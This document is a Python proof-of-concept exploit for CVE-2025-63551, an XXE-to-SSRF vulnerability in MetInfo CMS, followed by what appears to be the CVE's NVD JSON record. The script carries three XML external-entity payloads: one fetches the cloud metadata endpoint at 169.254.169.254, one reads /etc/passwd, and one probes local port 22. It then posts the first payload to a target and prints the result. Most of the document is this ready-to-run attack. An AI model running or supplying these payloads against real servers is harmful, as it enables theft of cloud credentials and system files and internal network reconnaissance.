CVE-2025-63551

import requests # CVE-2025-63551 XXE->SSRF PoC for MetInfo CMS # Target: MetInfo CMS <= 8.1 target_url = "http://target.com/admin/#/webset/?head_tab_active=0" # Malicious XML payload with XXE to trigger SSRF xxe_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/" > ]> <root> <config>&xxe;</config> </root>''' # Alternative: File read via XXE xxe_file_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <root> <config>&xxe;</config> </root>''' # Alternative: Port scanning via SSRF xxe_scan_payload = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://127.0.0.1:22/" > ]> <root> <config>&xxe;</config> </root>''' def exploit(target, payload): """Send XXE payload to trigger SSRF""" headers = { 'Content-Type': 'application/xml', 'User-Agent': 'Mozilla/5.0' } try: response = requests.post(target, data=payload, headers=headers, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" # Execute exploit result = exploit(target_url, xxe_payload) print("SSRF Response:", result)

{"cve": {"id": "CVE-2025-63551", "sourceIdentifier": "[email protected]", "published": "2025-11-06T19:15:43.433", "lastModified": "2026-02-04T21:14:49.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-Side Request Forgery (SSRF) vulnerability, achievable through an XML External Entity (XXE) injection, exists in MetInfo Content Management System (CMS) thru 8.1. This flaw stems from a defect in the XML parsing logic, which allows an attacker to construct a malicious XML entity that forces the server to initiate an HTTP request to an arbitrary internal or external network address. Successful exploitation could lead to internal network reconnaissance, port scanning, or the retrieval of sensitive information. The vulnerability may be present in the backend API called by or associated with the path `/admin/#/webset/?head_tab_active=0`, where user-provided XML data is processed."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.1", "matchCriteriaId": "4E26F911-FF19-4F97-8B64-5D44C88B1364"}]}]}], "references": [{"url": "https://github.com/sh4ll0t/SSRF-Vulnerability-in-MetInfo-via-XXE-Injection", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/sh4ll0t/SSRF-Vulnerability-in-MetInfo-via-XXE-Injection/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}